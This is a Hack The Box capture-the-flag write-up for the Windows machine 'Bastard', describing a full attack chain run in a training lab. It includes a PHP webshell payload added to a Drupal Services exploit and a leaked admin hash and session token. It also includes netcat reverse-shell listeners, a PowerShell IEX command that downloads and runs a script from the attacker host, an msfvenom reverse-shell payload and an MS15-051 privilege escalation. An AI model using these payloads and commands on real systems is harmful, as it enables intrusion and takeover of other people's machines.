Hack The Box - Bastard Writeup
Description:
Medium rated windows box running Drupal 7. This box provides a very good learning experience for OSCP.
Enumeration
Add bastard.htb to hosts and start an nmap scan.
Nmap
Nmap scan report for bastard.htb (10.10.10.9)
Host is up, received user-set (0.29s latency).
Scanned at 2020-08-18 10:22:16 EDT for 99s
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We have ports 80, 135 and 49154. Ports 135 and 49154 are related to microsoft rpc and generally are not exploitable. (Or I it might be not being skilled enough), Lets proceed to port 80.
We have a web application running on port 80. The CMS used is drupal 7.
Droopescan
droopescan is a tool that can be used to enumerate drupal and silverstripe applications.
kali@kali:~/Desktop/tools/autorecon/results/bastard.htb/scans$ droopescan
|
___| ___ ___ ___ ___ ___ ___ ___ ___ ___
| )| )| )| )| )|___)|___ | | )| )
|__/ | |__/ |__/ |__/ |__ __/ |__ |__/|| /
|
v1.33.7
Example invocations:
droopescan scan drupal -u URL_HERE
droopescan scan silverstripe -u URL_HERE
More info:
droopescan scan --help
Please see the README file for information regarding proxies.
kali@kali:~/Desktop/tools/autorecon/results/bastard.htb/scans$ droopescan scan drupal -u http://bastard.htb
[+] Plugins found:
ctools http://bastard.htb/sites/all/modules/ctools/
http://bastard.htb/sites/all/modules/ctools/CHANGELOG.txt
http://bastard.htb/sites/all/modules/ctools/changelog.txt
http://bastard.htb/sites/all/modules/ctools/CHANGELOG.TXT
http://bastard.htb/sites/all/modules/ctools/LICENSE.txt
http://bastard.htb/sites/all/modules/ctools/API.txt
libraries http://bastard.htb/sites/all/modules/libraries/
http://bastard.htb/sites/all/modules/libraries/CHANGELOG.txt
http://bastard.htb/sites/all/modules/libraries/changelog.txt
http://bastard.htb/sites/all/modules/libraries/CHANGELOG.TXT
http://bastard.htb/sites/all/modules/libraries/README.txt
http://bastard.htb/sites/all/modules/libraries/readme.txt
http://bastard.htb/sites/all/modules/libraries/README.TXT
http://bastard.htb/sites/all/modules/libraries/LICENSE.txt
services http://bastard.htb/sites/all/modules/services/
http://bastard.htb/sites/all/modules/services/README.txt
http://bastard.htb/sites/all/modules/services/readme.txt
http://bastard.htb/sites/all/modules/services/README.TXT
http://bastard.htb/sites/all/modules/services/LICENSE.txt
profile http://bastard.htb/modules/profile/
php http://bastard.htb/modules/php/
image http://bastard.htb/modules/image/
[+] Themes found:
seven http://bastard.htb/themes/seven/
garland http://bastard.htb/themes/garland/
[+] Possible version(s):
7.54
[+] Possible interesting urls found:
Default changelog file - http://bastard.htb/CHANGELOG.txt
Default admin - http://bastard.htb/user/login
[+] Scan finished (0:59:51.172306 elapsed)
Searchsploit
Searching drupal 7 on exploit db gives us few results.
kali@kali:~/Desktop/tools/autorecon/results/bastard.htb/scans$ searchsploit drupal 7.
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasp | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Exe | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scrip | php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We can see from droopescan that the site is running drupal 7.54. The system is vulnerable to Drupalgeddon2 and Drupalgeddon3. Both exploits work(Drupalgeddon3 requires logging in, which can be accomplished using the method we are going to use). I won’t be using these as they were released after the release of the box.
From the droopescan we can see that the site uses services module services and we do have an exploit for that. Module services provides api endpoints for interacting with the site. A detailed info regarding the exploit can be found here.
User Shell
The exploit requires us to provide the rest endpoint. I tried to find it using drib but the scan was really really slow. There are a couple of methods to find interesting files in drupal.
Fuzz /node/$ where $ is a number (from 1 to 500 for example). You could find hidden pages (test, dev) which are not referenced by the search engines.
Trying out http://bastard.htb/node/1 shows a page with details regarding the api endpoint that is /rest.
Now edit parts of the exploit.
$url = 'http://bastard.htb';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'joe.php',
'data' => '<?php system($_REQUEST["cmd"]); ?>'
];
Uploading a simple php webshell as the payload. php-curl needs to be installed before running the script.
kali@kali:~/Desktop/htb/bastard$ php mod.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://bastard.htb/joe.php
The exploit also created two files session.json and user.json.
User.json
kali@kali:~/Desktop/htb/bastard$ cat user.json
{
"uid": "1",
"name": "admin",
"mail": "drupal@hackthebox.gr",
"theme": "",
"created": "1489920428",
"access": "1492102672",
"login": 1597891473,
"status": "1",
"timezone": "Europe\/Athens",
"language": "",
"picture": null,
"init": "drupal@hackthebox.gr",
"data": false,
"roles": {
"2": "authenticated user",
"3": "administrator"
},
"rdf_mapping": {
"rdftype": [
"sioc:UserAccount"
],
"name": {
"predicates": [
"foaf:name"
]
},
"homepage": {
"predicates": [
"foaf:page"
],
"type": "rel"
}
},
"pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"
Session.json
{
"session_name": "SESS3be1999be4b134a44bef1e6c979c5741",
"session_id": "GW-o-VjGaQh8C0iUmQ9H3hF9zclzIcZTALbyOOn9dQY",
"token": "4QC_BpEizotQZYV8lANthATkegiE-COJCytDIMmDicY"
}
I tried cracking the hash, but it did not budge. The session information can be used as a cookie to login as admin user. A cookie with value of session_name as the cookie name and the value of session_id as the cookie value can give us admin access. This is required for Drupalgeddon3 exploit.
Browse to our webshell and use a nishang shell to get access.
kali@kali:~/Desktop/htb/bastard$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.15] from bastard.htb [10.10.10.9] 49173
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\inetpub\drupal-7.54>whoami
nt authority\iusr
Root Shell
Running Sherlock.ps1 to enumerate kernel issues shows that we have few possible exploits.
PS C:\inetpub\drupal-7.54> powershell.exe -exec bypass -C "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1');Find-AllVulns"
Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable
Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems
Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable
Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Not Vulnerable
Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
ample-Exploits/MS16-135
VulnStatus : Not Vulnerable
Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.h
tml
VulnStatus : Not Vulnerable
I will be using MS15-051 to exploit the system.
First create a payload using msfvenom.
kali@kali:~/Desktop/htb/bastard$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=8082 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
Start a smb server to serve the exploit binary and the msfvenom payload.
PS C:\inetpub\drupal-7.54> PS C:\inetpub\drupal-7.54> \\10.10.14.15\kali\ms15.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1724 created.
==============================
nt authority\system
PS C:\inetpub\drupal-7.54> \\10.10.14.15\kali\ms15.exe \\10.10.14.15\kali\shell.exe
Start a listener to receive the shell.
kali@kali:~/Desktop/htb/bastard$ nc -lvp 8082
listening on [any] 8082 ...
connect to [10.10.14.15] from bastard.htb [10.10.10.9] 49178
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
C:\inetpub\drupal-7.54>
And we are SYSTEM !.
